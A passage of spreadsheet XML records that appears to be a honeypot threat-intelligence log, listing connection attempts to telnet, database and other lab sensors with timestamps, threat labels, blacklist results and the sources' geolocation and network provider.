    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:e35d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1615"/>
    <x v="1615"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T19:42:27"/>
    <d v="2025-04-15T19:42:27"/>
    <d v="2025-04-15T19:42:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān (District 3)"/>
    <s v="6683528"/>
    <s v="NA"/>
    <s v="35.7837"/>
    <s v="51.4361"/>
    <s v="31549"/>
    <s v="RASANA"/>
    <s v="SHATEL Network"/>
    <s v="consumer"/>
    <s v="Shatel Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:54f1:1a60"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1616"/>
    <x v="1616"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T19:39:46"/>
    <d v="2025-04-15T19:38:00"/>
    <d v="2025-04-15T19:39:46"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="45609"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ad3:e7e7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1617"/>
    <x v="1617"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T19:27:32"/>
    <d v="2025-04-15T14:34:05"/>
    <d v="2025-04-15T19:27:32"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:984b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1618"/>
    <x v="1618"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T19:14:37"/>
    <d v="2025-04-15T19:14:37"/>
    <d v="2025-04-15T19:14:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:6cdc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1619"/>
    <x v="1619"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T19:02:32"/>
    <d v="2025-04-15T19:02:32"/>
    <d v="2025-04-15T19:02:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:cb0a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1620"/>
    <x v="1620"/>
    <s v="node-2rb.pool-1-2.dynamic.totinternet.net"/>
    <x v="0"/>
    <d v="2025-04-15T18:55:23"/>
    <d v="2025-04-15T18:55:23"/>
    <d v="2025-04-15T18:55:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="consumer"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-05-14 09:00:25"/>
    <s v="2026-05-14 09:00:25"/>
    <s v="2023-05-18 14:44:23"/>
    <s v="['CORA.NS.CLOUDFLARE.COM', 'PHIL.NS.CLOUDFLARE.COM']"/>
    <s v="GMO Internet, Inc."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:102:8df7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1621"/>
    <x v="1621"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T18:29:22"/>
    <d v="2023-12-04T06:04:00"/>
    <d v="2025-04-15T18:29:22"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="60083&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Mumbai"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:acca"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1622"/>
    <x v="1622"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T18:19:43"/>
    <d v="2025-01-08T13:20:17"/>
    <d v="2025-04-15T18:19:43"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:a63d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1623"/>
    <x v="1623"/>
    <s v="NA&amp;&amp;p2238014-ipxg00c01fukuokachu.fukuoka.ocn.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-15T18:11:55"/>
    <d v="2025-04-14T08:11:38"/>
    <d v="2025-04-15T18:11:55"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6916"/>
    <s v="139.768"/>
    <s v="4713"/>
    <s v="NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="business"/>
    <s v="OCN"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9989:4e0e"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1624"/>
    <x v="1624"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T17:29:12"/>
    <d v="2025-04-15T17:25:44"/>
    <d v="2025-04-15T17:29:12"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cc:830e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1625"/>
    <x v="1625"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T17:27:24"/>
    <d v="2025-04-15T17:27:24"/>
    <d v="2025-04-15T17:27:24"/>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f:fd7b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1626"/>
    <x v="1626"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T17:23:48"/>
    <d v="2024-12-24T18:38:56"/>
    <d v="2025-04-15T17:23:48"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Sivaganga"/>
    <s v="Kanadukattan"/>
    <s v="1268197"/>
    <s v="NA"/>
    <s v="10.1721"/>
    <s v="78.7794"/>
    <s v="134032"/>
    <s v="INFONET COMM ENTERPRISES"/>
    <s v="Infonet Comm Enterprises"/>
    <s v="business"/>
    <s v="Imperial Communication Entrepreneurs PVT LTD"/>
    <s v="2015-05-23"/>
    <s v="IMPERIAL"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.58.64.181,52976)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:673a:40b5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1627"/>
    <x v="1627"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T17:07:21"/>
    <d v="2025-04-15T17:07:21"/>
    <d v="2025-04-15T17:07:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:8b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1628"/>
    <x v="1628"/>
    <s v="dynamic-077-000-098-046.77.0.pool.telefonica.de"/>
    <x v="0"/>
    <d v="2025-04-15T16:56:47"/>
    <d v="2025-04-15T16:56:47"/>
    <d v="2025-04-15T16:56:47"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="NI"/>
    <s v="Lower Saxony"/>
    <s v="NA"/>
    <s v="Rosdorf"/>
    <s v="2845131"/>
    <s v="NA"/>
    <s v="51.5"/>
    <s v="9.9"/>
    <s v="6805"/>
    <s v="TDDE-ASN1"/>
    <s v="Telefonica Deutschland GmbH"/>
    <s v="corporate"/>
    <s v="Telefonica O2 Germany GmbH &amp; Co."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="None"/>
    <s v="None"/>
    <s v="::ffff:4d00:622e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1629"/>
    <x v="1629"/>
    <s v="r186-50-70-171.dialup.adsl.anteldata.net.uy&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T16:55:29"/>
    <d v="2025-04-15T12:56:58"/>
    <d v="2025-04-15T16:55:29"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="CA"/>
    <s v="Canelones"/>
    <s v="La Paz"/>
    <s v="La Paz"/>
    <s v="3442098"/>
    <s v="NA"/>
    <s v="-34.7603"/>
    <s v="-56.2259"/>
    <s v="6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="business"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ba32:46ab"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1630"/>
    <x v="1630"/>
    <s v="NA&amp;&amp;wsip-68-15-18-147.sd.sd.cox.net"/>
    <x v="0"/>
    <d v="2025-04-15T16:42:50"/>
    <d v="2023-07-28T03:27:34"/>
    <d v="2025-04-15T16:42:50"/>
    <n v="2394"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H35&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_PJL_H3&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SOCKS5_H42&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MT-CPA_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;35461&amp;&amp;42033&amp;&amp;48537&amp;&amp;80&amp;&amp;5900&amp;&amp;9100&amp;&amp;143&amp;&amp;5432&amp;&amp;443&amp;&amp;445&amp;&amp;1080&amp;&amp;43422&amp;&amp;46818&amp;&amp;52008&amp;&amp;50952&amp;&amp;49693&amp;&amp;53360&amp;&amp;39985&amp;&amp;48924&amp;&amp;55336&amp;&amp;60095&amp;&amp;NA&amp;&amp;55633&amp;&amp;34402&amp;&amp;36118&amp;&amp;52368"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
